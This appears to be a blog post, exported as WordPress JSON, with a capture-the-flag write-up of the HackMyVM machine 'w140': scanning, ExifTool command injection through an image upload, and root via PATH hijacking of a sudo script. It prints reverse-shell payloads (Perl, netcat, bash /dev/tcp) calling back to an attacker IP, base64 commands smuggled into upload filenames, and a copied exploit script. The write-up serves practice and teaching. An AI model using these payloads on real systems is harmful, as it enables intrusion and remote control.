{"id":641,"date":"2024-04-27T00:51:02","date_gmt":"2024-04-26T16:51:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=641"},"modified":"2024-04-27T00:51:02","modified_gmt":"2024-04-26T16:51:02","slug":"hmv-_-w140","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/641\/04\/27\/2024\/","title":{"rendered":"hmv[-_-]w140"},"content":{"rendered":"<h1>w140<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049407.png\" alt=\"image-20240426231140867\" style=\"zoom:50%;\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049408.png\" alt=\"image-20240426231651535\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ rustscan -a 10.0.2.20 -- -A    \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 10.0.2.20:22\nOpen 10.0.2.20:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)&nbsp;&nbsp;&nbsp;&#039;\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 11:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nInitiating Ping Scan at 11:17\nScanning 10.0.2.20 [2 ports]\nCompleted Ping Scan at 11:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 11:17\nCompleted Parallel DNS resolution of 1 host. at 11:17, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. 
Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 11:17\nScanning 10.0.2.20 [2 ports]\nDiscovered open port 22\/tcp on 10.0.2.20\nDiscovered open port 80\/tcp on 10.0.2.20\nCompleted Connect Scan at 11:17, 0.00s elapsed (2 total ports)\nInitiating Service scan at 11:17\nScanning 2 services on 10.0.2.20\nCompleted Service scan at 11:17, 6.07s elapsed (2 services on 1 host)\nNSE: Script scanning 10.0.2.20.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.32s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNmap scan report for 10.0.2.20\nHost is up, received syn-ack (0.00044s latency).\nScanned at 2024-04-26 11:17:25 EDT for 6s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 ff:fd:b2:0f:38:88:1a:44:c4:2b:64:2c:d2:97:f6:8d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJKWNkfy8PbdrAcMdxy7kWBq5iWHXTzkG3xRUBL5P88XuLi8SZLoMTwIcS5APTEU5hHz6ae2dNtq\/NRBD2NkLREINsgJNEgEEosMQLrJMCgUqVLZQGObJOG3USAQ42QmW3rMp34L2bSPqmq1IRGPbI1FoV6ToRveEXooUTiMrl07nVsI3xwdm7O6V653JmlE1qKYH\/tL1bQ5TQ43dX2INZRjuzB20SdOm5p1x2QnFcKjngbhmGDyYBN9FMSGsrPMdvjd6WHAeU0hzJgg7Uw55nkWzmWPfjwzkGTg1O74edFAgEj1AvBvl4Of3pcAf0EpxP5TOuawIsmKBmC+oQIgh2MgFXrKr7oMAxvSasvkAkMaXXe7tEMdDxgIr5w1TWgaxSUHM1vS58Z3+Ebxcss8NgbeeCA4iCUutg9iPPudFgzJSw7g0L0xS8w942f6DdQFOo65FEOwj9j54ESfMU8d6IyMtd1METepK3KFpyyBiiHYnjGOy9ns1E7f\/fo7+KtIM=\n|   256 ca:50:54:f7:24:4e:a7:f1:06:46:e7:22:30:ec:95:b7 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLCt2rpz+6Yt+kOCXbY2sLJEwc66kfCz200w1PiexHM7HN8IdliV0pg\/iktzu3lsOBeFwmYbsD1NHHZz7j6Ftgg=\n|   256 09:68:c0:62:83:1e:f1:5d:cb:29:a6:5e:b4:72:aa:cf (ED25519)\n|_ssh-ed25519 
AAAAC3NzaC1lZDI1NTE5AAAAIAI0q5tzWMhFnkW\/6Zz8ER108rSSLtVfq8YX5AnJ3vQG\n80\/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: w140\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.54 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 11:17\nCompleted NSE at 11:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.67 seconds<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ gobuster dir -u http:\/\/10.0.2.20 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.0.2.20\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 274]\n\/index.html    
       (Status: 200) [Size: 13235]\n\/.html                (Status: 403) [Size: 274]\n\/assets               (Status: 301) [Size: 307] [--&gt; http:\/\/10.0.2.20\/assets\/]\n\/service.html         (Status: 200) [Size: 3417]\n\/upload.php           (Status: 200) [Size: 3773]\n\/css                  (Status: 301) [Size: 304] [--&gt; http:\/\/10.0.2.20\/css\/]\n\/manual               (Status: 301) [Size: 307] [--&gt; http:\/\/10.0.2.20\/manual\/]\n\/js                   (Status: 301) [Size: 303] [--&gt; http:\/\/10.0.2.20\/js\/]\n\/.html                (Status: 403) [Size: 274]\n\/.php                 (Status: 403) [Size: 274]\n\/server-status        (Status: 403) [Size: 274]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ whatweb http:\/\/10.0.2.20\nhttp:\/\/10.0.2.20 [200 OK] Apache[2.4.54], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[10.0.2.20], JQuery[3.3.1], PasswordField[confirm-password,user-password], Script[text\/javascript], Title[w140]<\/code><\/pre>\n<h3>File Upload<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049409.png\" alt=\"image-20240426232542404\" style=\"zoom:50%;\" \/><\/p>\n<p>Trying to upload a reverse shell:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049410.png\" alt=\"image-20240426232746431\" style=\"zoom:50%;\" \/><\/p>\n<p>Uploading a disguised reverse shell failed, so let's just try uploading an ordinary photo!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049411.png\" alt=\"image-20240426233008375\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049412.png\" alt=\"image-20240426233022347\" style=\"zoom:50%;\" \/><\/p>\n<h3>Vulnerability Attempt<\/h3>\n<p>We can see the version, so let's search for vulnerabilities!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049414.png\" alt=\"image-20240426233203871\" style=\"zoom:50%;\" \/><\/p>\n<p>Let's try to exploit it, but things went far from smoothly when I tried:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ python3 50911.py -s 10.0.2.4 
1234                                        \n\n        _ __,~~~\/_        __  ___  _______________  ___  ___\n    ,~~`( )_( )-\\|       \/ \/ \/ \/ |\/ \/  _\/ ___\/ __ \\\/ _ \\\/ _ \\\n        |\/|  `--.       \/ \/_\/ \/    \/\/ \/\/ \/__\/ \/_\/ \/ , _\/ \/\/ \/\n_V__v__&amp;#_!_____V____\\____\/_\/|_\/___\/\\___\/\\____\/_\/|_\/____\/....\n\nRUNNING: UNICORD Exploit for CVE-2021-22204\nPAYLOAD: (metadata &quot;\\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#039;tcp&#039;));if(connect(S,sockaddr_in(1234,inet_aton(&#039;10.0.2.4&#039;)))){open(STDIN,&#039;&gt;&amp;S&#039;);open(STDOUT,&#039;&gt;&amp;S&#039;);open(STDERR,&#039;&gt;&amp;S&#039;);exec(&#039;\/bin\/sh -i&#039;);};};&quot;)\nTraceback (most recent call last):\n  File &quot;\/home\/kali\/temp\/w140\/50911.py&quot;, line 138, in &lt;module&gt;\n    exploit(command)\n  File &quot;\/home\/kali\/temp\/w140\/50911.py&quot;, line 74, in exploit\n    subprocess.run([&#039;bzz&#039;, &#039;payload&#039;, &#039;payload.bzz&#039;])\n  File &quot;\/usr\/lib\/python3.11\/subprocess.py&quot;, line 548, in run\n    with Popen(*popenargs, **kwargs) as process:\n         ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3.11\/subprocess.py&quot;, line 1026, in __init__\n    self._execute_child(args, executable, preexec_fn, close_fds,\n  File &quot;\/usr\/lib\/python3.11\/subprocess.py&quot;, line 1953, in _execute_child\n    raise child_exception_type(errno_num, err_msg, err_filename)\nFileNotFoundError: [Errno 2] No such file or directory: &#039;bzz&#039;<\/code><\/pre>\n<p>Actually the exploit itself is fine, but it needs a conversion step that is a bit involved, so let's try the existing msf module instead!<\/p>\n<p><a 
href=\"https:\/\/vk9-sec.com\/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204\/\">https:\/\/vk9-sec.com\/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204\/<\/a><\/p>\n<pre><code class=\"language-bash\">msf6 &gt; search exiftool 12.23\n\nMatching Modules\n================\n\n   #  Name                                                      Disclosure Date  Rank       Check  Description\n   -  ----                                                      ---------------  ----       -----  -----------\n   0  exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection  2021-05-24       excellent  No     ExifTool DjVu ANT Perl injection\n   1    \\_ target: JPEG file                                    .                .          .      .\n   2    \\_ target: TIFF file                                    .                .          .      .\n   3    \\_ target: DjVu file                                    .                .          .      .\n\nInteract with a module by name or index. 
For example info 3, use 3 or use exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection\nAfter interacting with a module you can manually set a TARGET with set TARGET &#039;DjVu file&#039;\n\nmsf6 &gt; use 3\n[*] Additionally setting TARGET =&gt; DjVu file\n[*] No payload configured, defaulting to cmd\/unix\/python\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) &gt; show options\n\nModule options (exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   FILENAME  msf.jpg          yes       Output file\n\nPayload options (cmd\/unix\/python\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\n   **DisablePayloadHandler: True   (no handler will be created!)**\n\nExploit target:\n\n   Id  Name\n   --  ----\n   2   DjVu file\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) &gt; set lport 1234\nlport =&gt; 1234\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) &gt; show options\n\nModule options (exploit\/unix\/fileformat\/exiftool_djvu_ant_perl_injection):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   FILENAME  msf.jpg          yes       Output file\n\nPayload options (cmd\/unix\/python\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  1234             yes       The listen port\n\n   **DisablePayloadHandler: True   (no handler will be 
created!)**\n\nExploit target:\n\n   Id  Name\n   --  ----\n   2   DjVu file\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) &gt; run\n\n[+] msf.jpg stored at \/home\/kali\/.msf4\/local\/msf.jpg\nmsf6 exploit(unix\/fileformat\/exiftool_djvu_ant_perl_injection) &gt; exit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ cp \/home\/kali\/.msf4\/local\/msf.jpg .<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049415.png\" alt=\"image-20240427000443651\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ file msf.jpg \nmsf.jpg: DjVu multiple page document<\/code><\/pre>\n<p>Wait, the vulnerable version is wrong...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049416.png\" alt=\"image-20240427001942610\" style=\"zoom:50%;\" \/><\/p>\n<p><a href=\"https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit\/blob\/main\/exploit.sh\">https:\/\/github.com\/dpbe32\/CVE-2022-23935-PoC-Exploit\/blob\/main\/exploit.sh<\/a><\/p>\n<pre><code class=\"language-shell\">#!\/bin\/bash\n\n# CVE-2022-23935 exiftool version 12.37\n\n# If the program gives error, you can exploit it manually with the following commands:\n\n#echo &quot;ping 10.10.14.70 -c1&quot; | base64\n#mv imagen.png &quot;echo base64_code|base64 -d|sh|&quot;\n\nfunction ctrl_c(){\n    echo -e &quot;\\n\\n [!] Exiting...\\n\\n&quot;\n    exit 1\n}\n\n# Ctrl+c\ntrap ctrl_c INT\n\nif [ &quot;$(id -u)&quot; == &quot;0&quot; ]; then\n    mv image.png &quot;echo $(echo &#039;whoami&#039;|base64) | base64 -d | sh&quot;\nelse\n    echo -e &quot;\\n[!] 
You need execute this program with root user&quot;\nfi<\/code><\/pre>\n<p>As you can see, the vulnerability works by putting the shell command into the filename!!!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140]\n\u2514\u2500$ echo &quot;nc -e \/bin\/bash 10.0.2.4 1234&quot; | base64\nbmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK<\/code><\/pre>\n<p>So the filename is: <code>echo bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK|base64 -d|sh|<\/code><\/p>\n<p>A normal upload certainly won't allow this, so capture the request and modify it!<\/p>\n<pre><code class=\"language-http\">Content-Disposition: form-data; name=&quot;image&quot;; filename=&quot;echo &#039;bmMgLWUgL2Jpbi9iYXNoIDEwLjAuMi40IDEyMzQK&#039;|base64 -d|sh|&quot;\n\nContent-Type: image\/png<\/code><\/pre>\n<p>Hmm, that didn't work; let's try a different one...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140\/CVE-2021-22204-exiftool]\n\u2514\u2500$ echo -n &quot;bash -i &gt;&amp; \/dev\/tcp\/10.0.2.4\/1234 0&gt;&amp;1&quot; | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC8xMjM0IDA+JjE=<\/code><\/pre>\n<pre><code class=\"language-http\">Content-Disposition: form-data; name=&quot;image&quot;; filename=&quot;echo -n &#039;YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC8xMjM0IDA+JjE=&#039;|base64 -d|bash|&quot;\n\nContent-Type: image\/png<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049417.png\" alt=\"image-20240427003523371\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@w140:\/var\/www\/uploads\/1714149308$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@w140:\/var\/www\/uploads\/1714149308$ cd ..\/..\/\n(remote) www-data@w140:\/var\/www$ ls -la\ntotal 48\ndrwxr-xr-x  4 root     root  4096 Feb 21  2023 .\ndrwxr-xr-x 12 root     root  4096 Jan 29  2023 ..\n-rw-r--r--  1 root     root 28744 Feb 21  2023 .w140.png\ndrwxr-xr-x  7 root     root  4096 Feb 14  2023 html\ndrwx------  8 www-data root  4096 Apr 26 12:35 uploads\n(remote) www-data@w140:\/var\/www$ cat .w140.png<\/code><\/pre>\n<h3>QR code decode!<\/h3>\n<p>What is this thing? Let's transfer it over and take a look:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049418.png\" alt=\"image-20240427004007237\" style=\"zoom:50%;\" \/><\/p>\n<p>Hmm, let's scan it: <a href=\"https:\/\/online-barcode-reader.inliteresearch.com\/\">https:\/\/online-barcode-reader.inliteresearch.com\/<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404270049419.png\" alt=\"image-20240427004113074\" style=\"zoom:50%;\" \/><\/p>\n<pre><code>BaoeCblP5KGJDmA<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) www-data@w140:\/var\/www$ ls -la\ntotal 48\ndrwxr-xr-x  4 root     root  4096 Feb 21  2023 .\ndrwxr-xr-x 12 root     root  4096 Jan 29  2023 ..\n-rw-r--r--  1 root     root 28744 Feb 21  2023 .w140.png\ndrwxr-xr-x  7 root     root  4096 Feb 14  2023 html\ndrwx------  8 www-data root  4096 Apr 26 12:35 uploads\n(remote) www-data@w140:\/var\/www$ cd \/home\n(remote) www-data@w140:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root  root  4096 Jan 29  2023 .\ndrwxr-xr-x 18 root  root  4096 Jan 29  2023 ..\ndrwxr-xr-x  3 ghost ghost 4096 Feb 21  2023 ghost\n(remote) www-data@w140:\/home$ su ghost\nPassword: \nghost@w140:\/home$ 
<\/code><\/pre>\n<p>Luckily there is only one user; I also tried root, but it wasn't right...<\/p>\n<h3>Hijacking Environment Variables<\/h3>\n<pre><code class=\"language-bash\">ghost@w140:\/home$ sudo -l\nMatching Defaults entries for ghost on w140:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ghost may run the following commands on w140:\n    (root) SETENV: NOPASSWD: \/opt\/Benz-w140\nghost@w140:\/home$ file \/opt\/Benz-w140\n\/opt\/Benz-w140: ASCII text\nghost@w140:\/home$ cat \/opt\/Benz-w140\n\n#!\/bin\/bash\n. \/opt\/.bashre\ncd \/home\/ghost\/w140      \n\n# clean up log files\nif [ -s log\/w140.log ] &amp;&amp; ! [ -L log\/w140.log ]\nthen\n\/bin\/cat log\/w140.log &gt; log\/w140.log.old\n\/usr\/bin\/truncate -s@ log\/w140.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name &#039;*.jpg&#039; -exec chown root:root {} \\;<\/code><\/pre>\n<p>Notice that find is invoked by its bare name rather than an absolute path; let's try to hijack it!!!<\/p>\n<pre><code class=\"language-bash\">ghost@w140:\/home$ cd \/tmp\nghost@w140:\/tmp$ echo &#039;chmod +s \/bin\/bash&#039; &gt; find\nghost@w140:\/tmp$ ls -l find\n-rw-r--r-- 1 ghost ghost 19 Apr 26 12:45 find\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ chmod +x find\nghost@w140:\/tmp$ PATH=$PWD:$PATH\nghost@w140:\/tmp$ echon $PATH\nbash: echon: command not found\nghost@w140:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\nghost@w140:\/tmp$ sudo -l\nMatching Defaults entries for ghost on w140:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ghost may run the following commands on w140:\n    (root) SETENV: NOPASSWD: 
\/opt\/Benz-w140\nghost@w140:\/tmp$ sudo \/opt\/Benz-w140\n.\n.\/find\n\/opt\/Benz-w140: 4: cd: can&#039;t cd to \/home\/ghost\/w140\nfind: \u2018source_images\u2019: No such file or directory\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ sudo $PATH \/opt\/Benz-w140\n[sudo] password for ghost: \nsudo: \/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin: command not found\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ sudo PATH=\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games \/opt\/Benz-w140\n\/opt\/Benz-w140: 4: cd: can&#039;t cd to \/home\/ghost\/w140\nghost@w140:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27  2022 \/bin\/bash\nghost@w140:\/tmp$ \/bin\/bash -p\nghost@w140:\/tmp# id\nuid=1000(ghost) gid=1000(ghost) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(ghost)\nghost@w140:\/tmp# cd \/root\nghost@w140:\/root# ls -la\ntotal 24\ndrwx------  3 root root 4096 Feb 21  2023 .\ndrwxr-xr-x 18 root root 4096 Jan 29  2023 ..\nlrwxrwxrwx  1 root root    9 Feb  8  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Feb 14  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Feb 21  2023 .python_history\n-rw-------  1 root root   33 Feb 21  2023 root.txt\nghost@w140:\/root# cat root.txt \n2f9f7d1b4a6ae9d6bbbaf6298c5dcc25<\/code><\/pre>\n<p>Actually, bash could have been launched directly here...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>w140 Information Gathering Port Scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/w140] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":642,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions\/642"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}